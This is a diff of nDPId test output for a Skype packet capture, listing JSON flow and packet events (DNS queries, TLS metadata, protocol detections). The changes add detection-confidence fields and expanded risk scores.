+01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431970634729,"flow_last_seen":1431970634990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"ts_msec":1431970634990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1431970635325,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970635325,"pkt":"0NQSxnP1PBXCt3IOCABFAAA657QAAEARD4vAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431970635375,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970635375,"pkt":"0NQSxnP1PBXCt3IOCABFAABA4MoAAEARFm\/AqAEiwKgBAdb0ADUALMTUeDABAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAAQAB"}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431970635375,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970635375,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWkkAAEARnPDAqAEiwKgBAf3LADUALKDXdTsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAHAAB"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1431970635433,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1431970635433,"pkt":"0NQSxnP1PBXCt3IOCABFAABECpEAAEAR7KTAqAEiwKgBAfitADUAMI+fhgYBAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1431970635489,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1431970635489,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1+K0AQBV0hgaBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAMABBfOIaY="}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635489,"flow_last_seen":1431970635489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431970635489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970635489,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPS1AAEAGAk3AqAEiF84hpsgfAbv4Tz2XAAAAALAC\/\/9zuAAAAgQFtAEDAwUBAQgKPjGKEwAAAAAEAgAA"}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1431970635531,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1431970635531,"pkt":"0NQSxnP1PBXCt3IOCABFAABDdt0AAEARgFnAqAEiwKgBAeUHADUAL+4jvNsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1431970635531,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1431970635531,"pkt":"0NQSxnP1PBXCt3IOCABFAABDiigAAEARbQ7AqAEiwKgBAe0QADUAL\/kqxMsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431970635534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970635534,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yB8YNTxd+E89mKASOJCdjgAAAgQFrAQCCArsPW3FPjGKEwEDAwU="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431970635534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970635534,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0P2xAAEAGABrAqAEiF84hpsgfAbv4Tz2YGDU8XoAQECz0iAAAAQEICj4xij\/sPW3F"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970635489,"flow_last_seen":1431970635535,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431970635535,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970635489,"flow_last_seen":1431970635535,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431970635535,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1431970635681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970635681,"pkt":"0NQSxnP1PBXCt3IOCABFAAA762oAAEARC9TAqAEiwKgBAfrwADUAJ8Zq760BAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1431970635681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970635681,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7\/zoAAEAR+APAqAEiwKgBAcLIADUAJ6plKNsBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1431970635827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970635827,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/rmUAAEARSNXAqAEiwKgBAfWbADUAK9VUuF8BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAABAAE="}
@@ -75,15 +75,15 @@
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431970635828,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970635828,"pkt":"0NQSxnP1PBXCt3IOCABFAABLGiMAAEAR3QvAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"ts_msec":1431970636044,"pkt":"PBXCt3IO0NQSxnP1CABFAAD5QB1AADEGlPMRj6CVwKgBIhRnxOfKLqrmIALxFIAYAQoi5AAAAQEIClVX3cw+MS9sFwMBAMAQLvPrUolszeBH4PjooKgoykESMntuxk1Te2w+x8Oya6GSybBw6qqEM+wWK2sXwWrrizJ5XKzKOAmSZesb7xCcv3da\/+28YcXK\/F7zVFmE31vvvLV8YkG8GBOlPbpZKZERb9mwy2LwmHQtz7O0hAoAaXw9xzeYM92S6l8kX5r5cFIIVhHHc18X56Qt2VFcbjB+OTKH9K3bn722DOl83K579IAjLFDRbrYAdebZ2GL8xgCQwxYSG690LowE4mV3zjs="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431970636044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970636044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0K69AAEAGmybAqAEiEY+glcTnFGcgAvEUyi6rq4AQD\/mVBgAAAQEICj4xjDlVV93M"}
 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431970636045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"ts_msec":1431970636045,"pkt":"0NQSxnP1PBXCt3IOCABFAACO6xNAAEAG22fAqAEiEY+glcTnFGcgAvEUyi6rq4AYEAB7VwAAAQEICj4xjDlVV93MFwMBACDcBm8C5CuEds5WH7uOVSaoSAeWe3pVfjpiQwGsBHUCdhcDAQAwqX6WBIxQfVe36rHY2TMg9Ev1HCHJmLbDku3Ki37TObTq6YVIEEF1VGVKw\/q+D6y6"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1431970636300,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970636300,"pkt":"0NQSxnP1PBXCt3IOCABFAABLV\/cAAEARnzfAqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="}
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1431970636301,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970636301,"pkt":"0NQSxnP1PBXCt3IOCABFAABLvh0AAEARORHAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
